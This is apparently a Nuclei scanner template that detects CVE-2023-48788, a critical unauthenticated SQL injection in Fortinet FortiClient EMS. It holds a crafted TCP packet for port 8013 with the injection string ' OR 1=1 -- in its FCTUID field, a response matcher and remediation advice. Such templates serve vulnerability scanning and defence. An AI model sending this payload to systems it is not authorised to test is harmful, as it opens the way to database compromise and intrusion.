id: CVE-2023-48788

info:
  name: Fortinet Forticlient Endpoint Management Server - SQL Injection
  author: James Horseman,ItshMoh
  severity: critical
  description: |
    A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands through specially crafted network packets to the FortiClient Endpoint Management Server, potentially compromising the database, accessing sensitive endpoint data, and executing unauthorized code.
  remediation: |
    Upgrade FortiClient EMS to version 7.2.3 or later for the 7.2.x series, or version 7.0.11 or later for the 7.0.x series.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48788
    cwe-id: CWE-89
    epss-score: 0.94038
    epss-percentile: 0.99903
    cpe: cpe:2.3:a:fortinet:forticlient_enterprise_management_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortinet
    product: forticlient_enterprise_management_server
  tags: cve,cve2023,sqli,fortinet,kev,vkev,vuln

tcp:
  - inputs:
      - data: |
          MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1 --{}\n
          IP=127.0.0.1\n
          MAC=00-50-56-11-22-33\n
          FCT_ONNET=0\n
          CAPS=32767\n
          VDOM=default\n
          EC_QUARANTINED=0\n
          SIZE=    {}\n
          \n
          X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n
          X-FCCK-REGISTER-END
          \r\n
          \r\n
    host:
      - "{{Hostname}}"
    port: 8013

    matchers:
      - type: word
        part: body
        words:
          - "KA_INTERVAL"
# digest: 490a0046304402203eee90e81e0459f05fe997da689e3e542f2b13b0831539bc6779fdf8bf65136b0220275e780b24f6fbfad7e36acb7e6631ad3a3a0a0ed3e6c8416e0a7d3300a137be:922c64590222798bb761d5b6d8e72950